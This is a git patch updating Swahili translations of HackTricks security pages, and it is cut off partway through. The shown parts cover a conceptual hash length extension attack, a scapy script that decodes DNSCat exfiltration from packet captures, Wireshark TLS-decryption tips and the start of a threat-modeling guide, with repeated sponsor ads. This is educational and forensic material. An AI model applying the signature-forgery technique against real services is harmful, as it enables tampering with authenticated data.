From 6524ba67ddffa6b57b41f0782a6b64111aa713cc Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 18 Apr 2024 03:38:36 +0000 Subject: [PATCH] Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi --- .../hash-length-extension-attack.md | 42 +++- .../pcap-inspection/dnscat-exfiltration.md | 47 +++-- .../pcap-inspection/wireshark-tricks.md | 95 +++++---- .../threat-modeling.md | 110 +++++++--- .../escaping-from-gui-applications.md | 129 +++++++----- .../pam-pluggable-authentication-modules.md | 76 ++++--- .../docker-security/apparmor.md | 162 ++++++++------- .../docker-release_agent-cgroups-escape.md | 77 ++++--- .../macos-red-teaming/macos-keychain.md | 148 ++++++++------ .../macos-memory-dumping.md | 76 ++++--- .../macos-users.md | 56 +++--- .../reversing-native-libraries.md | 70 +++---- .../frida-configuration-in-ios.md | 62 ++++-- .../1723-pentesting-pptp.md | 82 ++++---- .../1883-pentesting-mqtt-mosquitto.md | 58 ++++-- .../2375-pentesting-docker.md | 80 +++++--- network-services-pentesting/pentesting-irc.md | 79 ++++---- .../basic-voip-protocols/README.md | 109 ++++++---- .../electron-desktop-apps/README.md | 82 +++++--- .../iis-internet-information-services.md | 78 ++++--- pentesting-web/2fa-bypass.md | 116 +++++------ .../client-side-template-injection-csti.md | 56 ++++-- .../express-prototype-pollution-gadgets.md | 95 +++++---- ..._stream_prefer_studio-+-path-disclosure.md | 64 ++++-- .../lfi2rce-via-nginx-temp-files.md | 103 +++++----- .../postmessage-vulnerabilities/README.md | 80 +++++--- .../registration-vulnerabilities.md | 190 +++++++++++------- .../el-expression-language.md | 140 +++++++------ .../unicode-normalization.md | 74 ++++--- physical-attacks/physical-attacks.md | 74 +++---- todo/hardware-hacking/uart.md | 82 +++++--- .../access-tokens.md | 75 +++++-- .../juicypotato.md | 51 +++-- .../roguepotato-and-printspoofer.md | 97 ++++----- 34 files changed, 1851 insertions(+), 1164 deletions(-) diff --git a/crypto-and-stego/hash-length-extension-attack.md b/crypto-and-stego/hash-length-extension-attack.md index f00cc7ad1..f8e123b73 100644 --- a/crypto-and-stego/hash-length-extension-attack.md +++ b/crypto-and-stego/hash-length-extension-attack.md @@ -12,31 +12,44 @@ Njia nyingine za kusaidia HackTricks: +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- # Muhtasari wa shambulio -Fikiria seva ambayo ina **kutilia sahihi** baadhi ya **data** kwa **kuongeza** **siri** kwa baadhi ya data wazi inayojulikana kisha kuhakiki data hiyo. Ikiwa unajua: +Fikiria server ambayo ina **kutilia saini** baadhi ya **data** kwa **kuongeza** **siri** kwa baadhi ya data ya wazi inayojulikana kisha kuhakiki data hiyo. Ikiwa unajua: -* **Urefu wa siri** (hii inaweza pia kufanywa kwa nguvu kutoka kwa safu ya urefu uliopewa) -* **Data wazi** +* **Urefu wa siri** (hii inaweza pia kufanywa kwa nguvu kutoka kwa safu ya urefu uliyopewa) +* **Data ya wazi** * **Algoritimu (na ni dhaifu kwa shambulio hili)** * **Kujaza inajulikana** -* Kawaida moja ya msingi hutumiwa, hivyo ikiwa mahitaji mengine 3 yanakidhiwa, hii pia inatumika +* Kawaida moja ya msingi hutumiwa, hivyo ikiwa mahitaji mengine 3 yanakidhiwa, hii pia ni * Kujaza hubadilika kulingana na urefu wa siri+data, ndio maana urefu wa siri unahitajika -Basi, inawezekana kwa **mshambuliaji** kuongeza **data** na **kuzalisha** sahihi **kwa data iliyopita + data iliyongezwa**. +Basi, ni rahisi kwa **mshambuliaji** kuongeza **data** na **kuzalisha** saini halali kwa **data iliyopita + data iliyongezwa**. ## Vipi? -Kimsingi, algorithm dhaifu huzalisha hashes kwa kwanza **kutia sahihi kwa kundi la data**, na kisha, **kutoka** kwa **hash iliyoundwa awali** (hali), wan **ongeza kundi la data linalofuata** na **kulitia sahihi**. +Kimsingi, algorithm dhaifu huzalisha hashes kwa kwanza **kutia hash kibodi cha data**, na kisha, **kutoka** kwa **hash iliyoundwa awali** (hali), wan **ongeza kibodi ijayo cha data** na **kuitia hash**. -Kisha, fikiria kwamba siri ni "siri" na data ni "data", MD5 ya "secretdata" ni 6036708eba0d11f6ef52ad44e8b74d5b.\ +Kisha, fikiria kwamba siri ni "siri" na data ni "data", MD5 ya "siridata" ni 6036708eba0d11f6ef52ad44e8b74d5b.\ Ikiwa mshambuliaji anataka kuongeza herufi "ongeza" anaweza: * Kuzalisha MD5 ya "A" 64 * Badilisha hali ya hash iliyoundwa awali kuwa 6036708eba0d11f6ef52ad44e8b74d5b * Kuongeza herufi "ongeza" -* Kumaliza hash na hash inayotokana itakuwa **sahihi kwa "siri" + "data" + "kujaza" + "ongeza"** +* Kumaliza hash na hash inayotokana itakuwa **halali kwa "siri" + "data" + "kujaza" + "ongeza"** ## **Zana** @@ -46,6 +59,17 @@ Ikiwa mshambuliaji anataka kuongeza herufi "ongeza" anaweza: Unaweza kupata shambulio hili limeelezewa vizuri katika [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %}
@@ -57,6 +81,6 @@ Njia nyingine za kusaidia HackTricks: * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index eebd211ee..6104ddb97 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -1,21 +1,34 @@
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel -Ikiwa una pcap na data inayotumwa **kwa njia ya DNSCat** (bila kutumia encryption), unaweza kupata maudhui yaliyotumwa. +
-Unahitaji tu kujua kuwa **herufi 9 za kwanza** sio data halisi lakini zinahusiana na **mawasiliano ya C\&C**: +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + +Ikiwa una pcap na data inayotolewa na **DNSCat** (bila kutumia encryption), unaweza kupata yaliyomo yaliyotolewa. + +Unahitaji kujua kuwa **baiti 9 za kwanza** sio data halisi lakini zinahusiana na **mawasiliano ya C\&C**: ```python from scapy.all import rdpcap, DNSQR, DNSRR import struct @@ -34,24 +47,24 @@ last = qry #print(f) ``` -Kwa habari zaidi: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ +Kwa maelezo zaidi: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md) -Kuna script ambayo inafanya kazi na Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) -``` +Kuna script inayofanya kazi na Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) +```bash python3 dnscat_decoder.py sample.pcap bad_domain ```
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 390a68610..cb6e24650 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -4,19 +4,33 @@
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! +Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-## Boresha ujuzi wako wa Wireshark +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa: + +{% embed url="https://whiteintel.io" %} + +--- + +## Boresha Ujuzi wako wa Wireshark ### Mafunzo @@ -29,7 +43,7 @@ Mafunzo yafuatayo ni mazuri kujifunza mbinu za msingi za kushangaza: ### Taarifa Zilizochambuliwa -**Taarifa za Wataalamu** +**Taarifa za Mtaalam** Kwa kubonyeza _**Analyze** --> **Expert Information**_ utapata **muhtasari** wa kinachoendelea kwenye pakiti zilizochambuliwa: @@ -37,11 +51,11 @@ Kwa kubonyeza _**Analyze** --> **Expert Information**_ utapata **muhtasari** wa **Anwani Zilizotatuliwa** -Chini ya _**Statistics --> Resolved Addresses**_ unaweza kupata taarifa kadhaa ambazo zilitatuliwa na wireshark kama vile bandari/usalama hadi itifaki, MAC hadi mtengenezaji, nk. Ni muhimu kujua ni nini kinahusika katika mawasiliano. +Chini ya _**Statistics --> Resolved Addresses**_ unaweza kupata taarifa kadhaa zilizotatuliwa na wireshark kama vile bandari/mtandao hadi itifaki, MAC hadi mtengenezaji, n.k. Ni muhimu kujua ni nini kinahusika katika mawasiliano. ![](<../../../.gitbook/assets/image (571).png>) -**Muundo wa Itifaki** +**Mfumo wa Itifaki** Chini ya _**Statistics --> Protocol Hierarchy**_ unaweza kupata **itifaki** zinazohusika katika mawasiliano na data kuhusu hizo. @@ -55,7 +69,7 @@ Chini ya _**Statistics --> Conversations**_ unaweza kupata **muhtasari wa mazung **Vipengele vya Mwisho** -Chini ya _**Statistics --> Endpoints**_ unaweza kupata **muhtasari wa vipengele vya mwisho** katika mawasiliano na data kuhusu kila kimoja. +Chini ya _**Statistics --> Endpoints**_ unaweza kupata **muhtasari wa vipengele vya mwisho** katika mawasiliano na data kuhusu kila moja. ![](<../../../.gitbook/assets/image (575).png>) @@ -67,13 +81,13 @@ Chini ya _**Statistics --> DNS**_ unaweza kupata takwimu kuhusu ombi la DNS lili **Grafu ya I/O** -Chini ya _**Statistics --> I/O Graph**_ unaweza kupata **grafu ya mawasiliano**. +Chini ya _**Statistics --> I/O Graph**_ unaweza kupata **grafu ya mawasiliano.** ![](<../../../.gitbook/assets/image (574).png>) ### Vichujio -Hapa unaweza kupata vichujio vya wireshark kulingana na itifaki: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ +Hapa unaweza kupata kichujio cha wireshark kulingana na itifaki: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ Vichujio vingine vya kuvutia: * `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` @@ -81,23 +95,23 @@ Vichujio vingine vya kuvutia: * `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` * Trafiki ya HTTP na HTTPS ya awali + TCP SYN * `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` -* Trafiki ya HTTP na HTTPS ya awali + TCP SYN + ombi za DNS +* Trafiki ya HTTP na HTTPS ya awali + TCP SYN + Ombi za DNS ### Tafuta -Ikiwa unataka **kutafuta** **maudhui** ndani ya **pakiti** za vikao bonyeza _CTRL+f_. Unaweza kuongeza safu mpya kwenye mstari wa habari kuu (Nambari, Wakati, Chanzo, nk.) kwa kubonyeza kitufe cha kulia na kisha kuhariri safu. +Ikiwa unataka **tafuta** **maudhui** ndani ya **pakiti** za vikao bonyeza _CTRL+f_. Unaweza kuongeza safu mpya kwenye bar ya habari kuu (Namba, Wakati, Chanzo, n.k.) kwa kubonyeza kitufe cha kulia na kisha hariri safu. -### Maabara za pcap za bure +### Maabara za pcap za Bure -**Jifunze kwa vitendo na changamoto za bure za: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)** +**Jifunze na changamoto za bure za: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)** -## Kutambua Kikoa +## Kutambua Domains -Unaweza kuongeza safu inayoonyesha kichwa cha mwenyeji wa HTTP: +Unaweza kuongeza safu inayoonyesha Kichwa cha HTTP cha Mwenyeji: ![](<../../../.gitbook/assets/image (403).png>) -Na safu ambayo inaongeza jina la seva kutoka kwa uhusiano wa HTTPS unaosababisha (**ssl.handshake.type == 1**): +Na safu inayoongeza jina la Seva kutoka kwa muunganisho wa HTTPS wa kuanzisha (**ssl.handshake.type == 1**): ![](<../../../.gitbook/assets/image (408) (1).png>) @@ -105,7 +119,7 @@ Na safu ambayo inaongeza jina la seva kutoka kwa uhusiano wa HTTPS unaosababisha ### Kutoka kwa DHCP -Kwenye Wireshark ya sasa badala ya `bootp` unahitaji kutafuta `DHCP` +Katika Wireshark ya sasa badala ya `bootp` unahitaji kutafuta `DHCP` ![](<../../../.gitbook/assets/image (404).png>) @@ -117,29 +131,28 @@ Kwenye Wireshark ya sasa badala ya `bootp` unahitaji kutafuta `DHCP` ### Kufichua trafiki ya https na ufunguo binafsi wa seva -_edit>preference>protocol>ssl>_ +_badilisha>mapendeleo>itifaki>ssl>_ ![](<../../../.gitbook/assets/image (98).png>) -Bonyeza _Edit_ na ongeza data yote ya seva na ufunguo binafsi (_IP, Port, Itifaki, Faili ya ufunguo na nenosiri_) +Bonyeza _Hariri_ na ongeza data yote ya seva na ufunguo binafsi (_IP, Bandari, Itifaki, Faili ya Ufunguo na nenosiri_) ### Kufichua trafiki ya https na funguo za kikao za usawa -Firefox na Chrome zote zina uwezo wa kurekodi funguo za kikao za TLS, ambazo zinaweza kutumika na Wireshark kufichua trafiki ya TLS. Hii inaruhusu uchambuzi wa kina wa mawasiliano salama. Maelezo zaidi juu ya jinsi ya kufanya ufichuzi huu yanaweza kupatikana kwenye mwongozo kwenye [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). +Firefox na Chrome zote zina uwezo wa kurekodi funguo za kikao za TLS, ambazo zinaweza kutumika na Wireshark kufichua trafiki ya TLS. Hii inaruhusu uchambuzi wa kina wa mawasiliano salama. Maelezo zaidi kuhusu jinsi ya kufanya ufichuzi huu yanaweza kupatikana kwenye mwongozo kwenye [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). -Ili kugundua hii, tafuta ndani ya mazingira kwa kwenye kipengele cha `SSLKEYLOGFILE` +Ili kugundua hii, tafuta ndani ya mazingira kwa kivinjari `SSLKEYLOGFILE` -Faili ya funguo zilizoshirikiwa itaonekana kama hii: +Faili ya funguo za pamoja itaonekana kama hii: ![](<../../../.gitbook/assets/image (99).png>) -Ili kuimporti hii kwenye wireshark nenda kwa \_edit > preference > protocol > ssl > na iingize kwenye (Pre)-Master-Secret log filename: +Kuagiza hii kwenye wireshark enda kwa \_hariri > mapendeleo > itifaki > ssl > na iagize kwenye (Pre)-Master-Secret log filename: ![](<../../../.gitbook/assets/image (100).png>) - ## Mawasiliano ya ADB -Changanua APK kutoka kwa mawasiliano ya ADB ambapo APK ilitumwa: +Chambua APK kutoka kwenye mawasiliano ya ADB ambapo APK ilitumwa: ```python from scapy.all import * @@ -166,16 +179,28 @@ f = open('all_bytes.data', 'w+b') f.write(all_bytes) f.close() ``` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa: + +{% embed url="https://whiteintel.io" %} +
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/generic-methodologies-and-resources/threat-modeling.md b/generic-methodologies-and-resources/threat-modeling.md index 8d497d714..0adef0120 100644 --- a/generic-methodologies-and-resources/threat-modeling.md +++ b/generic-methodologies-and-resources/threat-modeling.md @@ -1,36 +1,50 @@ -# Uundaji wa Mfano wa Tishio +# Kufikiria Tishio -## Uundaji wa Mfano wa Tishio +## WhiteIntel -Karibu kwenye mwongozo kamili wa HackTricks juu ya Uundaji wa Mfano wa Tishio! Nenda kwenye uchunguzi wa sehemu muhimu ya usalama wa mtandao, ambapo tunatambua, kuelewa, na kuweka mkakati dhidi ya udhaifu wa uwezekano katika mfumo. Mfululizo huu ni mwongozo hatua kwa hatua uliojaa mifano halisi ya ulimwengu, programu muhimu, na maelezo rahisi kueleweka. Ni bora kwa wote wapya na wataalamu wenye uzoefu wanaotaka kuimarisha ulinzi wao wa usalama wa mtandao. +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + +## Kufikiria Tishio + +Karibu kwenye mwongozo kamili wa HackTricks kuhusu Kufikiria Tishio! Anza safari ya kuchunguza sehemu muhimu ya usalama wa mtandao, ambapo tunatambua, kuelewa, na kuweka mkakati dhidi ya udhaifu wa uwezekano katika mfumo. Mada hii inatumika kama mwongozo wa hatua kwa hatua uliojaa mifano halisi, programu inayofaa, na maelezo rahisi kueleweka. Ideal kwa wataalamu wa novice na wale wenye uzoefu wanaotaka kuimarisha ulinzi wao wa usalama wa mtandao. ### Matukio Yanayotumiwa Mara kwa Mara -1. **Uundaji wa Programu**: Kama sehemu ya Mzunguko wa Maisha wa Maendeleo ya Programu Salama (SSDLC), uundaji wa mfano wa tishio husaidia katika **utambuzi wa vyanzo vya uwezekano wa udhaifu** katika hatua za awali za maendeleo. -2. **Pentesting**: Mfumo wa Utekelezaji wa Upimaji wa Kuingilia (PTES) unahitaji **uundaji wa mfano wa tishio kuelewa udhaifu wa mfumo** kabla ya kufanya jaribio. +1. **Maendeleo ya Programu**: Kama sehemu ya Mzunguko wa Maendeleo Salama wa Programu (SSDLC), kufikiria tishio husaidia katika ** kutambua vyanzo vya uwezekano wa udhaifu ** katika hatua za mwanzo za maendeleo. +2. **Upimaji wa Kuingilia**: Mfumo wa Utekelezaji wa Upimaji wa Kuingilia (PTES) unahitaji **kufikiria tishio kuelewa udhaifu wa mfumo** kabla ya kutekeleza jaribio. -### Mfano wa Tishio kwa Ufupi +### Mfano wa Tishio kwa Kifupi -Mfano wa Tishio kwa kawaida unawakilishwa kama ramani, picha, au aina nyingine ya taswira inayoonyesha usanifu uliopangwa au ujenzi uliopo wa programu. Inafanana na **ramani ya mtiririko wa data**, lakini tofauti kuu iko katika muundo wake unaolenga usalama. +Mfano wa Tishio kawaida huonyeshwa kama ramani, picha, au aina nyingine ya mchoro wa kuonyesha usanidi uliopangwa au ujenzi uliopo wa programu. Inafanana na **ramani ya mtiririko wa data**, lakini tofauti kuu iko katika muundo wake unaolenga usalama. -Mifano ya tishio mara nyingi huonyesha vipengele vilivyowekwa alama kwa rangi nyekundu, ikionyesha udhaifu, hatari, au vizuizi vya uwezekano. Ili kuwezesha mchakato wa utambuzi wa hatari, triadi ya CIA (Uwazi, Uadilifu, Upatikanaji) hutumiwa, ikifanya msingi wa njia nyingi za uundaji wa mfano wa tishio, na STRIDE ikiwa moja ya njia za kawaida. Walakini, njia iliyochaguliwa inaweza kutofautiana kulingana na muktadha na mahitaji maalum. +Mifano ya tishio mara nyingi huonyesha vipengele vilivyowekwa 